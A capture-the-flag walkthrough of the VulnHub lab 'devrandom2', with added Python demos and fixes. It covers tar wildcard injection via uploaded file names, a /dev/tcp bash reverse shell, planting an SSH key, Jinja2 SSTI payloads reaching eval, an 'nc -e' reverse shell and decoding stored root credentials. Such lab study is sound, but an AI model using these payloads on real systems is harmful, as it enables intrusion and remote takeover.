https://www.vulnhub.com/entry/bluesmoke-devrandom2,678/
Scan all ports with nmap.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Check port 80: it hosts a backup system.
We can only upload .zip or .tar files. The backup job runs tar with a wildcard, so file names that look like options (--checkpoint=1, --checkpoint-action=exec=...) are parsed by tar as options: a tar wildcard injection. We create three files and pack them into a tar archive:
echo '' > --checkpoint=1
echo '' > '--checkpoint-action=exec=sh p.sh'
echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.150/1234 0>&1'" > p.sh
tar -cvf p.tar ./--checkpoint=1 ./--checkpoint-action=exec=sh\ p.sh ./p.sh
Then we upload p.tar and listen on port 1234. About a minute later, when the backup job runs tar over the uploaded files, we get a reverse shell.
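To see why the three files above are enough, here is an added example (not part of the writeup) that reproduces the wildcard injection locally: it creates the same file names in a temporary directory, then emulates the victim's `cd dir && tar -cf backup.tar *` by expanding the wildcard the way the shell would. p.sh is a stand-in that only writes a marker file instead of a reverse shell. The hardened variant expands to `./*`, which turns the option-looking names into plain paths. The directory name, marker file and `run_backup_job` helper are assumptions for the demo; GNU tar is required because --checkpoint is GNU-only.

```python
import os
import subprocess
import tempfile

# Added example, not the writeup's code: local reproduction of the tar wildcard injection.
# Assumptions: GNU tar is on PATH; "marker.txt" is our stand-in for the reverse shell.


def build_malicious_files(workdir):
    """Create the three files the attacker packs into p.tar; return the marker path."""
    marker = os.path.join(workdir, "marker.txt")
    open(os.path.join(workdir, "--checkpoint=1"), "w").close()
    open(os.path.join(workdir, "--checkpoint-action=exec=sh p.sh"), "w").close()
    with open(os.path.join(workdir, "p.sh"), "w") as f:
        # In the real attack this is the /dev/tcp reverse shell; here it just leaves proof.
        f.write(f"echo pwned > '{marker}'\n")
    return marker


def run_backup_job(workdir, hardened):
    """Emulate `cd workdir && tar -cf backup.tar *` (or `./*` when hardened)."""
    names = sorted(os.listdir(workdir))  # what the shell's * expands to (no dotfiles here)
    if hardened:
        names = ["./" + n for n in names]  # ./--checkpoint=1 is a path, not an option
    subprocess.run(["tar", "-cf", "backup.tar", *names], cwd=workdir,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False)
    marker = os.path.join(workdir, "marker.txt")
    if os.path.exists(marker):
        with open(marker) as f:
            return f.read().strip()
    return None  # p.sh never ran


def demo(hardened=False):
    """Build the files in a scratch directory and run the (un)hardened backup job."""
    with tempfile.TemporaryDirectory() as d:
        build_malicious_files(d)
        return run_backup_job(d, hardened)


if __name__ == "__main__":
    print("vulnerable:", demo(False))  # "pwned": tar parsed --checkpoint-action and ran p.sh
    print("hardened:  ", demo(True))   # None: names were passed as ./paths
```

The fix on the victim side is the hardened form: quote or prefix wildcard expansions (`./*`) or pass `--` before the file list, and never let uploaded file names reach a tar command line unescaped.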
From that shell we upload our id_rsa.pub into the user's ~/.ssh/authorized_keys and get an SSH login.
Upload pspy64, run it, and wait longer.
We see 'grep -q 1 /tmp/start' being run, which looks like a trigger check.
Create a file named "start" in /tmp with the content "1", then run pspy64 again and wait.
echo 1 > /tmp/start
A new service is running. Check the ports again: a new port, 8787, is open.
Forward port 8787 with ssh and check the service.
ssh -L 8787:127.0.0.1:8787 backupper@192.168.56.98
Use wfuzz to look for parameter names the site accepts (--hh 21 hides the baseline responses of 21 characters).
wfuzz -u 'http://127.0.0.1:8787/?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 21
The value of the "name" parameter is reflected in the page, and it is vulnerable to SSTI (the Python-style payload below confirms a Jinja2 template).
Let's try a longer SSTI payload that walks from a list literal to object's subclasses and reaches the builtins through a module-level function:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
Now we can get a reverse shell as remnie:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').system('nc 192.168.56.150 2234 -e /bin/bash')") }}{% endif %}{% endfor %}
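The payload above is an object walk, not a Jinja2 feature, so it can be studied without the vulnerable app. The following is an added example (not from the writeup) that performs the same steps in plain Python: `[].__class__.__base__` is `object`, its `__subclasses__()` lists every loaded class, `catch_warnings.__init__` is a Python function whose `__globals__` are the `warnings` module globals, and those include `__builtins__`. In Jinja2, `['__builtins__'].eval` works because attribute lookup falls back to item lookup on a dict; here we index the dict directly. The helper names are my own.

```python
import os

# Added example, not the writeup's code: the SSTI gadget chain written as plain Python.
# Assumption: the `warnings` module is loaded (CPython imports it at startup).


def find_subclass(name):
    """[].__class__.__base__ is `object`; every loaded class appears in its __subclasses__()."""
    for cls in [].__class__.__base__.__subclasses__():
        if cls.__name__ == name:
            return cls
    return None


def builtins_via_gadget(name="catch_warnings"):
    """A function defined in an imported module carries that module's globals, which
    include __builtins__; that is how the payload reaches eval without naming a module."""
    cls = find_subclass(name)
    if cls is None:
        raise LookupError(f"no loaded subclass of object named {name!r}")
    b = cls.__init__.__globals__["__builtins__"]
    # In imported modules __builtins__ is the builtins dict; in __main__ it is the module.
    return b if isinstance(b, dict) else vars(b)


def run_via_gadget(command):
    """Equivalent of the payload's eval("__import__('os').popen('id').read()")."""
    source = f"__import__('os').popen({command!r}).read()"
    return builtins_via_gadget()["eval"](source)


if __name__ == "__main__":
    print(run_via_gadget("id"), end="")
```

The application-side fix is to never use user input as the template source: render a fixed template and pass the value in as a variable (for Flask, `render_template_string("Hello {{ name }}", name=name)` instead of `render_template_string(name)`), and keep the reflected value escaped.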
Then in /home/remnie/scripts we find a strange server.conf.
Copy the encoded content into CyberChef and apply this recipe (it is layered encoding, not encryption):
From Hexdump --> Find/Replace (space to '') --> From Binary --> From Hex --> From Base32 --> From Base64
That yields the root credentials.
Finally, we get root.
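The same recipe can be scripted so it is reproducible without CyberChef. This is an added example (not from the writeup): `decode_server_conf` applies the six steps in order, and `encode_server_conf` runs them in reverse to build a constructed sample hexdump for testing, since the real server.conf content is not reproduced here. The sample string "user:example_password" is made up; the hexdump layout (8-digit offset, 16 hex pairs, |ascii| column) is the classic format CyberChef's From Hexdump accepts.

```python
import base64
import re

# Added example, not the writeup's code: the CyberChef recipe as a Python pipeline.


def from_hexdump(dump):
    """Parse a classic hexdump (offset, hex pairs, optional |ascii| column) back to bytes."""
    out = bytearray()
    for line in dump.splitlines():
        line = line.split("|", 1)[0]                        # drop the ASCII column
        line = re.sub(r"^[0-9a-fA-F]{4,}:?\s+", "", line)   # drop the leading offset
        out += bytes.fromhex(line.replace(" ", ""))
    return bytes(out)


def from_binary(text):
    """'01100001 01100010' -> b'ab'; spaces are the Find/Replace step of the recipe."""
    bits = text.replace(" ", "")
    if len(bits) % 8:
        raise ValueError("binary string is not byte-aligned")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def decode_server_conf(dump):
    """From Hexdump -> strip spaces -> From Binary -> From Hex -> From Base32 -> From Base64."""
    binary_text = from_hexdump(dump).decode("ascii")   # the dump contains '0'/'1' text
    hex_text = from_binary(binary_text).decode("ascii")
    b32_text = bytes.fromhex(hex_text)
    b64_text = base64.b32decode(b32_text)
    return base64.b64decode(b64_text).decode("utf-8")


def encode_server_conf(plain):
    """Reverse of the recipe; only used to build a constructed sample for testing."""
    b64_text = base64.b64encode(plain.encode())
    b32_text = base64.b32encode(b64_text)
    hex_text = b32_text.hex().encode()
    binary_text = " ".join(f"{b:08b}" for b in hex_text).encode()
    lines = []
    for off in range(0, len(binary_text), 16):
        chunk = binary_text[off:off + 16]
        hexcol = " ".join(f"{b:02x}" for b in chunk)
        lines.append(f"{off:08x}  {hexcol:<47}  |{chunk.decode()}|")
    return "\n".join(lines)


if __name__ == "__main__":
    sample = encode_server_conf("user:example_password")  # constructed, not the real file
    print(sample)
    print(decode_server_conf(sample))
```

If a real server.conf does not decode cleanly, the step that fails tells you which layer differs (a non-byte-aligned binary string, or a base32 alphabet mismatch, for example), which is the same feedback CyberChef gives one operation at a time.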